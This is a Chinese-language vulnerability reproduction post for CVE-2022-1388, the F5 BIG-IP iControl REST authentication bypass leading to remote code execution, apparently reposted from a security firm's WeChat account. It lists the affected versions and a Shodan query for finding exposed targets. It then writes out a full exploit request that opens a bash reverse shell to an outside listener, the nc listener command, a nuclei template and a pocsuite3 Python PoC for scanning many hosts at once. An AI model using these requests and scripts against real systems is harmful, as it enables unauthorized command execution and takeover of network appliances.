漏洞复现 CVE-2022-1388 F5 BIG-IP RCE

admin 2022年5月19日01:58:06安全文章评论107 views3678字阅读12分15秒阅读模式

0x01 漏洞描述

   F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。漏洞存在于iControl REST组件中,未经身份验证的攻击者可以发送请求绕过BIG-IP中的iControl REST认证,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。漏洞复现 CVE-2022-1388 F5 BIG-IP RCE


0x02 漏洞复现

漏洞影响:

BIG-IP 16.x: 16.1.0 - 16.1.2

BIG-IP 15.x: 15.1.0 - 15.1.5

BIG-IP 14.x: 14.1.0 - 14.1.4

BIG-IP 13.x: 13.1.0 - 13.1.4

BIG-IP 12.x: 12.1.0 - 12.1.6

BIG-IP 11.x: 11.6.1 - 11.6.5

shodan:http.title:"BIG-IP®-+Redirect" +"Server"


1.执行反弹shell命令

POST /mgmt/tm/util/bash HTTP/1.1Host: x.x.x.xContent-Length: 85Connection: Keep-Alive, X-F5-Auth-TokenCache-Control: max-age=0aX-F5-Auth-Token: aAuthorization: Basic YWRtaW46xxxxx=
{"command":"run","utilCmdArgs":"-c 'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'"}

漏洞复现 CVE-2022-1388 F5 BIG-IP RCE


3. nc监听得到shell

nc -lnvp 7777

漏洞复现 CVE-2022-1388 F5 BIG-IP RCE


4.使用nuclei批量验证1.txt文件中的url是否存在该漏洞,显示存在漏洞。nuclei稳定快,编写poc简单,有社区维护,推荐使用)

nuclei下载地址:https://github.com/projectdiscovery/nuclei

批量验证命令:nuclei -list 1.txt -t CVE-2022-1388.yaml
yaml POC:id: CVE-2022-1388
info: name: F5 BIG-IP iControl REST Auth Bypass RCE author: dwisiswant0 severity: critical description: | This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only. reference: - https://twitter.com/GossiTheDog/status/1523566937414193153 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2022-1388 cwe-id: CWE-306 tags: cve
variables: auth: "admin:"
requests: - raw: - | POST /mgmt/tm/util/bash HTTP/1.1 Host: {{Hostname}} Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a Authorization: Basic {{base64(auth)}} Content-Type: application/json
{ "command": "run", "utilCmdArgs": "-c 'echo ryaqkj'" }
matchers: - type: word words: - "commandResult" - "ryaqkj" condition: and

漏洞复现 CVE-2022-1388 F5 BIG-IP RCE


5.使用pocsuite3批量验证1.txt文件中的url是否存在该漏洞,显示一个成功一个失败。

pocsuite3下载地址:https://github.com/knownsec/pocsuite3或公众号回复poc3即可下载

使用方法:python3 cli.py -r pocs/CVE-2022-1388.py -f 1.txt
poc:# -*- coding:utf-8 -*-
from pocsuite3.api import Output, POCBase, register_poc, requests, loggerfrom pocsuite3.api import get_listener_ip, get_listener_portfrom pocsuite3.api import REVERSE_PAYLOADfrom urllib.parse import urljoinfrom pocsuite3.lib.utils import random_str

class DemoPOC(POCBase): vulID = "CVE-2022-1388" version ='F5 BIG-IP 16.x: 16.1.0 - 16.1.2' author = ["ry"] vulDate = "2022-05-18" createDate = "2022-05-18" updateDate = "2022-05-18" references =["https://support.f5.com/csp/article/K23605346"] name ="F5 BIG-IP RCE" appPowerLink = '' appName = 'F5 BIG-IP' appVersion = '''BIG-IP 16.x: 16.1.0 - 16.1.2 BIG-IP 15.x: 15.1.0 - 15.1.5 BIG-IP 14.x: 14.1.0 - 14.1.4 BIG-IP 13.x: 13.1.0 - 13.1.4 BIG-IP 12.x: 12.1.0 - 12.1.6 BIG-IP 11.x: 11.6.1 - 11.6.5''' vulType = 'RCE' desc = ''' F5 BIG-IP RCE ''' samples = [] install_requires = ['']
def _verify(self): result = {} path = "/mgmt/tm/util/bash" url = urljoin(self.url,path) payload = "{"command":"run","utilCmdArgs":"-c 'echo ryaqjk'"}" headers = { 'Content-Length': '54', 'Connection': 'Keep-Alive, X-F5-Auth-Token', 'Cache-Control': 'max-age=0a', 'X-F5-Auth-Token': 'a', 'Authorization': 'Basic YWRtaW46' } rr = requests.post(url=url,headers=headers,data=payload) try: if "ryaqjk" and "commandResult" in rr.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['Name'] = payload except Exception as e: pass return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output
def _attack(self): return self._verify()register_poc(DemoPOC)

漏洞复现 CVE-2022-1388 F5 BIG-IP RCE

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog


原文始发于微信公众号(融云攻防实验室):漏洞复现 CVE-2022-1388 F5 BIG-IP RCE

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月19日01:58:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  漏洞复现 CVE-2022-1388 F5 BIG-IP RCE https://cn-sec.com/archives/1019233.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: